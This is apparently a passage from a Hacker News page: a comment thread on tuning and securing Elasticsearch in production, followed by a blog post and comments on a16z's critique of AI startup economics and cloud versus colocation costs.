I feel like a lot of hate Java gets nowadays is largely due to historical reasons.

Though come to think of it, if you're talking about ES itself and not Java, then I have no idea, I never used ES in prod.

CameronNemo(4096) 2 days ago [-]

You can check out https://vector.dev/ to replace Logstash. Not sure about replacing Elasticsearch with something non-Java. Especially for the search use case -- Lucene is fairly dominant. For metrics you have prometheus (Go, not sure if that is better for memory issues with the non-tunable GC). You will probably want/need a clustered storage backend for prometheus. For that you have lots of options: https://prometheus.io/docs/operating/integrations/#remote-en... . Of those, TiKV (Rust), InfluxDB (Go), and TimescaleDB (C - its a Postgresql extension) seem like decent options.

there_the_and(10000) 2 days ago [-]

Unsecured Elasticsearch servers have been implicated in multiple breaches in recent months [1][2]. Since this post is an 'In depth guide to running Elasticsearch in production," it should prominently include information related to security and configuration. With tools like these where there is a learning curve for new users, security can end up treated as an afterthought, leading to these kinds of breaches.

1. https://www.pandasecurity.com/mediacenter/news/billion-consu...

2. https://thedefenceworks.com/blog/250-million-microsoft-recor...

Edited for clarity

skinnyarms(4290) 2 days ago [-]

I just wanted to point out that Elastic has made some changes in the last year or so that help with security like...

* [Making security bits available with the ('free') basic license](https://www.elastic.co/blog/security-for-elasticsearch-is-no...) * [Releasing Kubernetes Operators with security enabled by default](https://www.elastic.co/guide/en/cloud-on-k8s/current/index.h...)

This has the effect of making most 'getting started' guide setups more secure by default, which is good.

Unfortunately this is a new change and those bits are not in the Apache licensed core offering, but it's still a big improvement IMHO.

cloakandswagger(10000) 2 days ago [-]

This guide is clearly intended to focus on the ops-side of ElasticSearch. No one is being irresponsible, you're basically just complaining that the article was written about one topic instead of another.

Notice how it also doesn't talk about system architecture, load balancers, disaster recovery, etc? It's because the author chose to focus the post on cluster configuration. The topic of security could be its own standalone writeup and I highly doubt that its omission is an endorsement for running an ES cluster totally exposed and unsecured.

caro_douglos(10000) 2 days ago [-]

While we're at it let's touch on how vulnerable nginx is because port 80 is open.

/s

bobjordan(3738) 2 days ago [-]

An ES stack is fairly easy to get up and running in a development environment with docker-compose. But, not so much with a secure production installation. After going down the path of trying to get production up and running with security, I found Open Distro for Elasticsearch [1] to be very helpful. https://opendistro.github.io/for-elasticsearch/

troelsSteegin(10000) 2 days ago [-]

I appreciate the systems perspective and find the writeup useful. However, from a production perspective, I think security should be topic one.

speedplane(4270) 1 day ago [-]

> from a production perspective, I think security should be topic one

Two general approaches to security:

- Upgrade to a paid Elastic cluster, and use their own feature-full security suite.

- Put a reverse proxy server in front of Elastic (like nginx), and configure that to handle security.

jugg1es(10000) 1 day ago [-]

Great to read from someone who knows it so deeply.

speedplane(4270) 1 day ago [-]

> Great to read from someone who knows it so deeply.

I'd say it's a decent read on Elasticsearch tuning at the intermediate level, but not enough to really get high performance from Elastic.

One of the problems with Elastic tuning is that the tuning parameters depend deeply on the type of data you're indexing. Indexing text is far different than indexing numbers or dates. A mapping with a large number of fields will behave differently than with just a few. Some datasets can easily be split up into different indexes, and others are cannot be.

To really get the most from Elasticsearch, you have to know what it's doing under-the-hood, and how that maps on to your data. Elasticsearch hides so much complexity (generally a good thing), but unfortunately, it can be difficult to know where the bottlenecks are.

DmitryOlshansky(10000) 2 days ago [-]

Mostly good stuff but a few comments:

- article doesn't clarify if it's on hardware or VMs

- 140 shards per node is certainly on the low side, one can easily scale to 500+ per node (if most shards are small, typically power law distribution)

- more RAM is better, and there is a ratio of disk:ram that you need to keep in mind (30-40 for hot data, 200-300 for warm data)

- heaps beyond 32g can be beneficial but you'd have to go for 64g+, 32-48g is a dead zone

- not a single line about GC tuning (I find default CMS to be quite horrible even in recommended ~31g sizes)

- CPUs are often a bottleneck when using SSD drives

paulddraper(4100) 1 day ago [-]

> 140 shards per node is certainly on the low side

That seems high, no?

Unless you were planning on scaling 20x, it seems you could easily have half the number.

detaro(2041) 2 days ago [-]

> - heaps beyond 32g can be beneficial but you'd have to go for 64g+, 32-48g is a dead zone

I'm curious why that is the case?

hilbertseries(10000) 2 days ago [-]

I'm kind of surprised this article doesn't mention anything about how many nodes you want in your cluster. Since ES performance starts to degrade once you get past 40 or so nodes .

MuffinFlavored(4310) 2 days ago [-]

Serious question: does indexing Logstash/JSON logs really need to take gigabytes of memory + disk and sharding?

holoduke(10000) 2 days ago [-]

Is your list not entirely depending on the usecase? I am using ES for years with over 1 million daily users. It provides simple search funtionality. it runs on a single node with 4gb of memory. For more than 5 years with hardly any issues.

StreamBright(2786) 2 days ago [-]

Yep, I can confirm the GC part. We start with that before touching anything else to get the most out of the system. G1GC is pretty tunable.

DmitryOlshansky(10000) 2 days ago [-]

And another note on shards - indexing a shard is a single writer process.

If your drive tolerates parallel writes well (=SSD) having multiple primary shards per node helps scale indexing.

jillesvangurp(10000) 1 day ago [-]

The article isn't that good because it mostly just verbatim repeats (some of) the information in the official documentation but sadly mixes it with a lot of things that are simply not correct/misunderstood. Also it omits a lot of stuff that is actually important.

The hierarchy breakdown in the article is misleading. Lucene indexes fields, not documents. Understanding this is key. More fields == more files. Segments are per field not per ES index. A lucene index is not the same as an Elasticsearch index.

Segments are not immutable but an append only file structure. Lucene creates a new segment every time you create a new writer instance or when the lucene index is committed, which is something that happens every second in ES by default and something you could configure to something higher. So, new segment files are created frequently but not on a per document basis. ES/Lucene indeed constantly merge segment files as an optimization. Force merge is not something you should need to do often and certainly not while it is writing heavily. A good practice with log files is to do this after you roll over your indices. With modern setups, you should be reading up on index life cycle management (ILM) to manage this for you.

The notion that ES crashes at ~140 shards is complete bullshit that is based on a misunderstanding of the above. It depends on what's in those shards (i.e. how many fields). Each field has its own sets of files for storing the reverse index, field data, etc. So, how many shards your cluster can handle depends on how your data is structured and how many of them you have. This also means you needs lots of file handles.

Understanding how heap memory is used in ES is key and this article does not mention the notion of memory mapped files and even goes as far as to recommend the filesystem cache is not important!! This too is very misguided. The reality is that most index files are memory mapped files (i.e. not stored in the heap) and they only fit in memory if you have enough file cache memory available. Heap memory is used for other things (e.g. the query cache, write buffers, small data-structures with metadata about fields, etc.) and there are a lot of settings to control that which you might want to familiarize yourself with if you are experiencing throughput issues. Per index heap overhead is actually comparatively modest. I've had clusters with 1000+ shards with far less memory. This is not a problem if those shards are smallish.

The 32GB memory limit is indeed real if you use compressed pointers (which you need to configure on the JVM, ES does this by default). Far more important is that garbage collect performance tends to suffer with larger heaps because it has more stuff to do. The default heap settings with ES are not great for large heaps. ES recommends having at least (as a minimum) half your RAM available for caching. More is better. Having more disk than filecache means your files don't fit into ram. That can be OK for write heavy setups and might be OK for some querying (depending on which fields you actually query on). But generally having everything fit into memory results in more predictable performance.

GC tuning is a bit of a black art and unless you have mastered that, don't even think about messing with the GC settings in ES. It's one of those things where copy pasting some settings somebody else came up with can have all sorts of negative consequences. Most clusters that lose data do so because of GC pauses cause nodes to drop out of the cluster. Mis-configuring this makes that more likely.

CPU is important because ES uses CPU and threadpools for a lot of things and is very good at e.g. concurrently writing to multiple segments concurrently. Most of these threadpools configure based on the number of available CPUs and can be controlled via settings that have sane defaults. Also, depending on how you set up your mappings (another thing this article does not talk about) your write performance can be CPU intensive. E.g. geospatial fields involve a bit of number crunching and some more advanced text analysis can also suck up CPU.

karlney(10000) 2 days ago [-]

Hi, do you have real use experience running elasticsearch with 64g+ heap?

Is there any articles/benchmark/notes or anything that you would be willing to share?

We have considered trying out 64g+ heaps for our cluster but we are concerned about very long gc pauses impacting the search performance.

shreyshrey(4299) 2 days ago [-]

For ES and solr gurus here what is the recommended max size for documents if you want to index lot of office documents?

itronitron(4166) 2 days ago [-]

Whatever makes sense to your users for their search results. Do they want to get back the whole document or just the relevant parts?

If there are separate sections in the office documents that you can pull out and index as separate fields then you should do that. For example, if you were indexing patents, you would want to index abstracts and claims into separate fields.

speedplane(4270) 1 day ago [-]

> For ES and solr gurus here what is the recommended max size for documents if you want to index lot of office documents?

I run a large ES index covering 80TB of data, and regularly index documents as large as 20MB. At that size, the bottleneck is often transferring that much data over a network to the ES cluster. You need to make sure your HTTP client can handle it, and the network has enough bandwidth. Elasticsearch itself is not really the bottleneck.

mychael(4235) 2 days ago [-]

Is there a guide for deploying ES on K8S?

amtux(10000) 2 days ago [-]

For kubes you could use the helm chart they provide and tune it similarly. https://github.com/elastic/helm-charts/tree/master/elasticse...

manigandham(775) 1 day ago [-]

Elastic just released their operator called Elastic Cloud on Kubernetes (ECK): https://www.elastic.co/blog/elastic-cloud-on-kubernetes-ECK-...

Operators are basically mini-programs that run in your K8S cluster and automatically handle deployment, upgrades and maintenance for their specific software. This operator can setup all of the ELK stack and it's all done through custom resource definitions. Use this instead of the helm charts and manual YAML files.

speedgoose(10000) 2 days ago [-]

I was considering to use ElasticSearch to replace my CouchDB indexes that are way too slow, memory hungry, and not optimized. But I read somewhere, can't remember the source, that ElasticSearch doesn't offer any guarantee that all your data will (eventually) be saved or returned when queried. Is that the case?

frant-hartm(10000) 2 days ago [-]

Maybe you are thinking of Aphyr's analysis of elastic search where he showed that Elastic can lose indexed documents during network partitions:

https://aphyr.com/posts/323-call-me-maybe-elasticsearch-1-5-...

That has been done on relatively old version. Elastic documents known (and fixed) issues here https://www.elastic.co/guide/en/elasticsearch/resiliency/cur... but I wouldn't trust this to the letter mainly because of their previous handling of such issues.

Elastic is great as a search index, not as a primary database.

CameronNemo(4096) 2 days ago [-]

They have done quite a bit of work to improve resiliency. You can learn more about the status of this work here:

https://www.elastic.co/guide/en/elasticsearch/resiliency/cur...

TL;DR it is still probably not ideal as a primary data store.

AznHisoka(3064) 2 days ago [-]

The default refresh rate for ES is a minute or so (can't remember the exact time). This means when you index a document, it won't be returned when you search for it until a minute later when the index refreshes.

But you can certainly change the configuration so it's practically real-time. There will be some performance hit though.

harryf(4117) 2 days ago [-]

Struggling to read this ... the domain typo triggering OCD

StreamBright(2786) 2 days ago [-]

For a long time, I read articles only in Pocket. The web has become unreadable at this stage. It is a bit funny that it was created to make the distribution of knowledge easier, having readability its primary feature.

ivan_ah(2859) 2 days ago [-]

Does anyone have experience running Elasticsearch as a kubernetes deployment? Can you just spin up some big-RAM containers attached to persisted volumes?

Elastic Co. seems to have an offering specialized for k8s: https://www.elastic.co/elastic-cloud-kubernetes but I can't understand what it does exactly.

Our data is not crazy-big and it doesn't need to be super performant, but for operational simplicity I'd like to deploy as part of the production cluster like all our other app containers rather than some 'special' type of container.

zegl(4279) 2 days ago [-]

Yep, I'm running ES in a StatefulSet. It works nicely out of the box using headless Services for node-to-node discovery, and by using a custom preStop hook, to make sure that the cluster wouldn't become RED after the node shuts down.

kuhsaft(10000) 2 days ago [-]

I found Elastic Cloud on K8s to be the best way to deploy and manage Elastic clusters on Kubernetes so far.

https://www.elastic.co/guide/en/cloud-on-k8s/current/index.h...

kuhsaft(10000) 2 days ago [-]

Elastic Cloud on K8s is an operator that uses CRDs to define Elastic resources. The operator manages and deploys the appropriate deployments and statefulsets for the resource. It handles upgrades of the Elastic services as well. The operator pattern creates a more declarative way of provisioning Elastic resources.

_jsnk(10000) 2 days ago [-]

I was successful in using this guide: https://aws.amazon.com/blogs/opensource/open-distro-for-elas... to setup Amazon's Open Distro version of Elasticsearch/Kibana. I had to modify it to work with Elasticsearch 7.x (which corresponds to Open Distro 1.x). This guide was written for Elasticsearch 6.x (which corresponds to Open Distro 0.x).

StreamBright(2786) 2 days ago [-]

Great writeup. I wish there was a search engine built on the top of Riak that has a bit simpler workload distribution.

peterwwillis(2666) 2 days ago [-]

There's really nothing simple about building apps on top of Riak. It's one of those things that seems simple until you use it in production, and then you realize it's a total nightmare and you can't wait to sunset it.

statictype(3509) 2 days ago [-]

Is Riak still supported and used?

I was under the impression that it's dead.

Is that not the case?

ram_rar(10000) 2 days ago [-]

We used to use ElasticSearch a lot for log aggregations. Its a beast of its own. you still need a dedicated team to handle this. Eventually moved to Splunk, wavefront like solutions. It ll costs a lot lesser and frees up engineering time to build a better product.

m1keil(10000) 1 day ago [-]

related to this: anyone can share practical advice when it comes to running Elasticsearch for application and infrastructure log aggregation?

We started from using Elastic Cloud which is nice enough and saves us the time to initial configuration. However I'm still unsure if the choices I made are the right way to go when designing the indexes.

thickice(4248) 2 days ago [-]

Genuine questions as someone with no experience in dealing with large sclae log aggregation: Can you share some details on what kind of issues you ran into in production with Elastic Search that needed a dedicated team to manage ?

andrewflnr(3680) 2 days ago [-]

This was a really helpful article for understanding the architecture of Elasticsearch. However, what I really want to know is why Elastic has the reputation of crapping itself for no reason and what can be done about it.

arwhatever(10000) 2 days ago [-]

It seems like most articles discussing Elastic search administration read like an instruction manual for something like steam locomotive - describing just how to constantly shovel the coal in, relieving the steam pressure in just the right way, etc.

tyingq(4263) 2 days ago [-]

Does it still have the issue of failing 'open to the world' if the x-pack trial expires? See: https://discuss.elastic.co/t/ransom-attack-on-elasticsearch-...

bpicolo(10000) 2 days ago [-]

Xpack's basic features come builtin in latest Elasticsearch - trial is for a separate set of features.

kuhsaft(10000) 2 days ago [-]

X-Pack Auth is now free and included with Elasticsearch.

karambir(4122) 2 days ago [-]

We were hit by this on Kibana 6.x as I didn't read the x-pack trial properly. I thought at least login would be there. My bad. We added Nginx auth after that.

But x-pack security is actually free from some point release in version 7. Though x-pack is not open source, just free to use. So our nginx Kibana auth is still there.

timv(4240) 1 day ago [-]

I'm the lead engineer for Elasticsearch security.

I'm sorry - I have never seen that specific post on our forums before, but the poster was mistaken and by not correcting it at the time, we have allowed incorrect information to perpetuate.

In versions where security was a paid feature, if a trial license expired, security would remain enabled, but certain operations would be rejected for all users (per the warning text 'Cluster health, cluster stats and indices stats operations are blocked')

We intentionally did not open the cluster to be world readable/writable. The administrator would be left with a cluster that was secure, but blocked access to some functions that are necessary for running a production cluster. It was up to them to explicitly upgrade to a paid license and re-enable those APIs, or downgrade to a 'basic' license which required acknowledgement that security would be disabled.

An example (this is from 6.7.0 because it's the newest version I have installed at the moment, where security was not free. This was true at the time the original forum post was written - I just tested 5.2.0 as well, and the results are the same, with slightly different error messages):

License state:

   license [fc5bee69-f086-4989-a32a-5db329692363] mode [trial] - valid
  license [fc5bee69-f086-4989-a32a-5db329692363] - expired
  recovered [1] indices into cluster_state
  LICENSE [EXPIRED] ON [SATURDAY, SEPTEMBER 28, 2019].
Curl without credentials:

  curl http://localhost:9200/
  {'error':{'root_cause':[{'type':'security_exception','reason':'missing authentication token for REST request [/]','header':{'WWW-Authenticate':['ApiKey','Basic realm=\'security\' charset=\'UTF-8\'']}}],'type':'security_exception','reason':'missing authentication token for REST request [/]','header':{'WWW-Authenticate':['ApiKey','Basic realm=\'security\' charset=\'UTF-8\'']}},'status':401}%
Curl with credentials:

  curl -u elastic http://localhost:9200/
  Enter host password for user 'elastic':
  {
    'name' : 'node1',
    'cluster_name' : 'es-670',
    ...
Blocked cluster health:

  curl -u elastic http://localhost:9200/_cluster/health
  Enter host password for user 'elastic':
  {'error':{'root_cause':[{'type':'security_exception','reason':'current license is non-compliant for [security]','license.expired.feature':'security'}],'type':'security_exception','reason':'current license is non-compliant for [security]','license.expired.feature':'security'},'status':403}
Logs:

  blocking [indices:monitor/stats] operation due to expired license. ...
However, as mentioned by other sibling comments, security has been included in the free license since May last year, so as far as security is concerned, there is no longer a choice to make when a trial expires.

(Disclosure, as mentioned at the top, I work for Elastic)

six2seven(10000) 2 days ago [-]

As an alternative, there's an open-source OpenDistro for ElasticSearch [1] that offers X-Pack-like security with some other X-Pack-like features. Although it is not officially supported by elastic.co, but it's a pretty good alternative and is supported by Netflix, Amazon, et all. Worth giving a try.

[1] https://opendistro.github.io/for-elasticsearch/

winrid(4161) 2 days ago [-]

I have found you need a queue in front of ES for better write reliability, more so than other DBs. The read/aggregation performance is fantastic though.

Also, you should know a little about GC tuning too

petemc_(10000) 2 days ago [-]

Can I ask how you implemented such a queue?




(652) Andreessen-Horowitz craps on "AI" startups from a great height

652 points about 21 hours ago by dostoevsky in 4306th position

scottlocklin.wordpress.com | Estimated reading time – 14 minutes | comments | anchor

Andreessen-Horowitz has always been the most levelheaded of the major current year VC firms. While other firms were levering up on "cleantech" and nonsensical biotech startups that violate physical law, they quietly continued to invest in sane companies (also hot garbage bugman products like soylent). I assume they actually listen to people on the front lines, rather than what their VC pals are telling them. Maybe they're just smarter than everyone else; definitely more independent minded. Their recent review on how "AI" differs from software company investments is absolutely brutal. I am pretty sure most people didn't get the point, so I'll quote it emphasizing the important bits.

https://a16z.com/2020/02/16/the-new-business-of-ai-and-how-its-different-from-traditional-software/

They use all the buzzwords (my personal bete-noir; the term "AI" when they mean "machine learning"), but they've finally publicly noticed certain things which are abundantly obvious to anyone who works in the field. For example, gross margins are low for deep learning startups that use "cloud" compute. Mostly because they use cloud compute.

Gross Margins, Part 1: Cloud infrastructure is a substantial – and sometimes hidden – cost for AI companies

In the old days of on-premise software, delivering a product meant stamping out and shipping physical media – the cost of running the software, whether on servers or desktops, was borne by the buyer. Today, with the dominance of SaaS, that cost has been pushed back to the vendor. Most software companies pay big AWS or Azure bills every month – the more demanding the software, the higher the bill.

AI, it turns out, is pretty demanding:

  • Training a single AI model can cost hundreds of thousands of dollars (or more) in compute resources. While it's tempting to treat this as a one-time cost, retraining is increasingly recognized as an ongoing cost, since the data that feeds AI models tends to change over time (a phenomenon known as "data drift").
  • Model inference (the process of generating predictions in production) is also more computationally complex than operating traditional software. Executing a long series of matrix multiplications just requires more math than, for example, reading from a database.
  • AI applications are more likely than traditional software to operate on rich media like images, audio, or video. These types of data consume higher than usual storage resources, are expensive to process, and often suffer from region of interest issues – an application may need to process a large file to find a small, relevant snippet.
  • We've had AI companies tell us that cloud operations can be more complex and costly than traditional approaches, particularly because there aren't good tools to scale AI models globally. As a result, some AI companies have to routinely transfer trained models across cloud regions – racking up big ingress and egress costs – to improve reliability, latency, and compliance.

Taken together, these forces contribute to the 25% or more of revenue that AI companies often spend on cloud resources. In extreme cases, startups tackling particularly complex tasks have actually found manual data processing cheaper than executing a trained model.

This is something which is true of pretty much all machine learning with heavy compute and data problems. The pricing structure of "cloud" bullshit is designed to extract maximum blood from people with heavy data or compute requirements. Cloud companies would prefer to sell the time on a piece of hardware to 5 or 10 customers. If you're lucky enough to have a startup that runs on a few million rows worth of data and a GBM or Random Forest, it's probably not true at all, but precious few startups are so lucky. Those who use the latest DL woo on the huge data sets they require will have huge compute bills unless they buy their own hardware. For reasons that make no sense to me, most of them don't buy hardware.

In many problem domains, exponentially more processing and data are needed to get incrementally more accuracy. This means – as we've noted before – that model complexity is growing at an incredible rate, and it's unlikely processors will be able to keep up. Moore's Law is not enough. (For example, the compute resources required to train state-of-the-art AI models has grown over 300,000x since 2012, while the transistor count of NVIDIA GPUs has grown only ~4x!) Distributed computing is a compelling solution to this problem, but it primarily addresses speed – not cost.

Beyond what they're saying about the size of Deep Learning models which is doubtless true for interesting new results, admitting that the computational power of GPU chips hasn't exactly been growing apace is something rarely heard (though more often lately). Everyone thinks Moore's law will save us. NVIDIA actually does have obvious performance improvements that could be made, but the scale of things is such that the only way to grow significantly bigger models is by lining up more GPUs. Doing this in a "cloud" you're renting from a profit making company is financial suicide.

Gross Margins, Part 2: Many AI applications rely on "humans in the loop" to function at a high level of accuracy

Human-in-the-loop systems take two forms, both of which contribute to lower gross margins for many AI startups.

First: training most of today's state-of-the-art AI models involves the manual cleaning and labeling of large datasets. This process is laborious, expensive, and among the biggest barriers to more widespread adoption of AI. Plus, as we discussed above, training doesn't end once a model is deployed. To maintain accuracy, new training data needs to be continually captured, labeled, and fed back into the system. Although techniques like drift detection and active learning can reduce the burden, anecdotal data shows that many companies spend up to 10-15% of revenue on this process – usually not counting core engineering resources – and suggests ongoing development work exceeds typical bug fixes and feature additions.

Second: for many tasks, especially those requiring greater cognitive reasoning, humans are often plugged into AI systems in real time. Social media companies, for example, employ thousands of human reviewers to augment AI-based moderation systems. Many autonomous vehicle systems include remote human operators, and most AI-based medical devices interface with physicians as joint decision makers. More and more startups are adopting this approach as the capabilities of modern AI systems are becoming better understood. A number of AI companies that planned to sell pure software products are increasingly bringing a services capability in-house and booking the associated costs.

Everyone in the business knows about this. If you're working with interesting models, even assuming the presence of infinite accurately labeled training data, the "human in the loop" problem doesn't ever completely go away. A machine learning model is generally "man amplified." If you need someone (or, more likely, several someone's) making a half million bucks a year to keep your neural net producing reasonable results, you might reconsider your choices. If the thing makes human level decisions a few hundred times a year, it might be easier and cheaper for humans to make those decisions manually, using a better user interface. Better user interfaces are sorely underappreciated. Have a look at Labview, Delphi or Palantir's offerings for examples of highly productive user interfaces.

Since the range of possible input values is so large, each new customer deployment is likely to generate data that has never been seen before. Even customers that appear similar – two auto manufacturers doing defect detection, for example – may require substantially different training data, due to something as simple as the placement of video cameras on their assembly lines.

Software which solves a business problem generally scales to new customers. You do some database back end grunt work, plug it in, and you're done. Sometimes you have to adjust processes to fit the accepted uses of the software; or spend absurd amounts of labor adjusting the software to work with your business processes: SAP is notorious for this. Such cycles are hugely time and labor consuming. Obviously they must be worth it at least some of the time. But while SAP is notorious (to the point of causing bankruptcy in otherwise healthy companies), most people haven't figured out that ML oriented processes almost never scale like a simpler application would. You will be confronted with the same problem as using SAP; there is a ton of work done up front; all of it custom. I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for it are probably more valuable than the actual machine learning piece.

In the AI world, technical differentiation is harder to achieve. New model architectures are being developed mostly in open, academic settings. Reference implementations (pre-trained models) are available from open-source libraries, and model parameters can be optimized automatically. Data is the core of an AI system, but it's often owned by customers, in the public domain, or over time becomes a commodity.

That's right; that's why a lone wolf like me, or a small team can do as good or better a job than some firm with 100x the head count and 100m in VC backing. I know what the strengths and weaknesses of the latest woo is. Worse than that: I know that, from a business perspective, something dumb like Naive Bayes or a linear model might solve the customer's problem just as well as the latest gigawatt neural net atrocity. The VC backed startup might be betting on their "special tool" as its moaty IP. A few percent difference on a ROC curve won't matter if the data is hand wavey and not really labeled properly, which describes most data you'll encounter in the wild. ML is undeniably useful, but it is extremely rare that a startup have "special sauce" that works 10x or 100x better than somthing you could fork in a git repo. People won't pay a premium over in-house ad-hoc data science solutions unless it represents truly game changing results. The technology could impress the shit out of everyone else, but if it's only getting 5% better MAPE (or whatever); it's irrelevant. A lot of "AI" doesn't really work better than a histogram via "group by" query. Throwing complexity at it won't make it better: sometimes there's no data in your data.

Some good bullet points for would be "AI" technologists:

Eliminate model complexity as much as possible. We've seen a massive difference in COGS between startups that train a unique model per customer versus those that are able to share a single model (or set of models) among all customers....

Nice to be able to do, but super rare. If you've found a problem like this, you better hope you have a special, moaty solution, or a unique data set which makes it possible.

Choose problem domains carefully – and often narrowly – to reduce data complexity. Automating human labor is a fundamentally hard thing to do. Many companies are finding that the minimum viable task for AI models is narrower than they expected. Rather than offering general text suggestions, for instance, some teams have found success offering short suggestions in email or job postings. Companies working in the CRM space have found highly valuable niches for AI based just around updating records. There is a large class of problems, like these, that are hard for humans to perform but relatively easy for AI. They tend to involve high-scale, low-complexity tasks, such as moderation, data entry/coding, transcription, etc.

This is a huge admission of "AI" failure. All the sugar plum fairy bullshit about "AI replacing jobs" evaporates in the puff of pixie dust it always was. Really, they're talking about cheap overseas labor when lizard man fixers like Yang regurgitate the "AI coming for your jobs" meme; AI actually stands for "Alien (or) Immigrant" in this context. Yes they do hold out the possibility of ML being used in some limited domains; I agree, but the hockey stick required for VC backing, and the army of Ph.D.s required to make it work doesn't really mix well with those limited domains, which have a limited market.

Embrace services. There are huge opportunities to meet the market where it stands. That may mean offering a full-stack translation service rather than translation software or running a taxi service rather than selling self-driving cars.

In other words; you probably can't build a brain in a can that can solve all kinds of problems: you're probably going to be a consulting and services company. In case you aren't familiar with valuations math: services companies are worth something like 2x yearly revenue; where software and "technology" companies are worth 10-20x revenue. That's why the wework weasel kept trying to position his pyramid scheme as a software company. The implications here are huge: "AI" raises done by A16z and people who think like them are going to be at much lower valuations. If it weren't clear enough by now, they said it again:

To summarize: most AI systems today aren't quite software, in the traditional sense. And AI businesses, as a result, don't look exactly like software businesses. They involve ongoing human support and material variable costs. They often don't scale quite as easily as we'd like. And strong defensibility – critical to the "build once / sell many times" software model – doesn't seem to come for free.

These traits make AI feel, to an extent, like a services business. Put another way: you can replace the services firm, but you can't (completely) replace the services.

I'll say it again since they did: services companies are not valued like software businesses are. VCs love software businesses; work hard up front to solve a problem, print money forever. That's why they get the 10-20x revenues valuations. Services companies? Why would you invest in a services company? Their growth is inherently constrained by labor costs and weird addressable market issues.

This isn't exactly an announcement of a new "AI winter," but it's autumn and the winter is coming for startups who claim to be offering world beating "AI" solutions. The promise of "AI" has always been to replace human labor and increase human power over nature. People who actually think ML is "AI" think the machine will just teach itself somehow; no humans needed. Yet, that's not the financial or physical reality. The reality is, there are interesting models which can be applied to business problems by armies of well trained DBAs, data engineers, statisticians and technicians. These sorts of things are often best grown inside a large existing company to increase productivity. If the company is sclerotic, it can hire outside consultants, just as they've always done. A16z's portfolio reflects this. Putting aside their autonomous vehicle bets (which look like they don't have a large "AI" component to them), and some health tech bets that have at least linear regression tier data science, I can only identify only two overtly data science related startup they've funded. They're vastly more long crypto currency and blockchain than "AI." Despite having said otherwise, their money says "AI" companies don't look so hot.

My TLDR summary:

  1. Deep learning costs a lot in compute, for marginal payoffs
  2. Machine learning startups generally have no moat or meaningful special sauce
  3. Machine learning startups are mostly services businesses, not software businesses
  4. Machine learning will be most productive inside large organizations that have data and process inefficiencies




All Comments: [-] | anchor

yogrish(2795) about 17 hours ago [-]

Now a days DL models are becoming commodities very fast. By the time you train NN to solve a particular problem, a new efficient model is out somewhere and is available public. So you need to go through the process entirely or else you risk losing business. Unless your NN is so unique like you are handcrafting your own in which case you take lot of time to arrive at a best model and you need more PhDs.

jeremysalwen(10000) about 14 hours ago [-]

Props to the ML community for being so open.

bryanrasmussen(272) about 19 hours ago [-]

Generally the use of the phrase from a great height implies the height is one of morality, intellect, or valor (each of these decreasing in usage), I'm not exactly sure what the great height Andreessen-Horowitz craps from is composed of - maybe money?

I think they may just be crapping on them from a reasonable vantage point.

KaiserPro(10000) about 19 hours ago [-]

The height is not really about morals. Its more about the blast radius of the shit.

raiyu(3364) about 20 hours ago [-]

The number of places where machine learning can be used effectively from both a cost perspective and a return perspective are small. They are usually tremendously large datasets at gigantic companies, and they probably have to build in house expertise because it's hard to package this up into a product and resell it for various industries, datasets, etc.

Certainly something like autonomous driving needs machine learning to function, but again, these are going to be owned by large corporations, and even when a startup is successful, it's really about the layered technology on-top of machine learning that makes it interesting.

It's kind of like what Kelsey Hightower said about Kubernetes. It's interesting and great, but what will really matter is what service you put on top of it, so much so that whether you use Kubernetes becomes irrelevant.

So I think companies that are focusing on a specific problem, providing that value added service, building it through machine learning, can be successful. While just broadly deploying machine learning as a platform in and of itself can be very challenging.

And I think the autonomous driving space is a great example of that. They are building a value added service in a particular vertical, with tremendous investment, progress, and potentially life changing tech down the road. But as a consumer it's really the autonomous driving that is interesting, not whether they are using AI/machine learning to get there.

andreilys(10000) about 19 hours ago [-]

"The number of places where machine learning can be used effectively from both a cost perspective and a return perspective are small."

Thankfully transfer learning and super convergence invalidates this claim.

Using pre-trained models + specific training techniques significantly reduces the amount of data you need, your training time and the cost to create near state of the art models.

Both Kaggle and google colab offer free GPU.

Q6T46nT668w6i3m(3555) about 20 hours ago [-]

How would you explain the rise (and success) of machine learning in science? A lab that uses some learning-based method will likely be limited to just one or two people (responsible for data acquisition, feature engineering, evaluation, etc.) and extremely finite data.

jorblumesea(10000) about 15 hours ago [-]

It's interesting that the industry constantly has to relearn the idea that tech needs follow business needs, not the other way around. As you said, so many teams rushing to containerize, but if the services you run are piles of junk, do your users care about whether kubernetes can scale based on memory instead of cpu? Similarly, many effective 'recommendation engines' are just inverted indexes and not fancy ML models, and are a hell of a lot cheaper.

joshuaellinger(3999) about 18 hours ago [-]

I just spent $50K on coloc hardware. I'm taking a $10K/mo Azure spend down to a $1K/mo hosting cost.

But the real kicker is that I get x5 the cores, x20 RAM, x10 storage, and a couple of GPUs. I'm running last-generation Infiniband (56gb/sec) and modern U.2 SSDs (say 500MB/sec per device).

I figure it is going to take me about $10K in labor to move and then $1K/mo to maintain and pay for services that are bundled in the cloud. And because I have all this dedicated hardware, I don't have to mess around with docker/k8s/etc.

It's not really a big data problem but it shows the ROI on owning your own hardware. If you need 100 servers for one day per month, the cloud is amazing. But I do a bunch of resampling, simple models, and interactive BI type stuff, so co-loc wins easily.

Merrill(4248) about 5 hours ago [-]

This whole topic recapitulates all the arguments for business units acquiring and operating their own servers versus continuing to suffer the internal bill-backs from the corporate data center.

Some of the same caveats apply with respect to software updates, configuration control, security, availability, business continuity, disaster recovery, and what happens if the local admin is hit by a bus.

wpietri(3437) about 17 hours ago [-]

I'm sure your right for your case. But I'd add one caveat for those less experienced: if you own the hardware, you need to be prepared to go to the colo when something breaks. The various clouds are a much nicer experience when hardware fails. At the very least people should have enough spare capacity that a hardware failure means going sometime in the next couple of weeks, rather than getting up at 3 am and fixing things under pressure.

dboreham(3307) about 16 hours ago [-]

We never went cloud, except for ancillary things like build machines, nagios etc that run on tiny VMs. Whenever I looked at the economics I could buy a server of the class we needed for roughly 2x the monthly rent for the equivalent from Amazon.

sabalaba(2218) about 10 hours ago [-]

Yea we're seeing this all over the place at Lambda (https://lambdalabs.com). Most people running consistent GPU training or inference jobs are building on-prem clusters or even groups of workstations.

It just doesn't make financial sense to use the big the cloud service providers for those with consistent workloads. I always hear stories where folks have saved hundreds of thousands in infrastructure costs with owning + co-lo.

bsenftner(4284) about 15 hours ago [-]

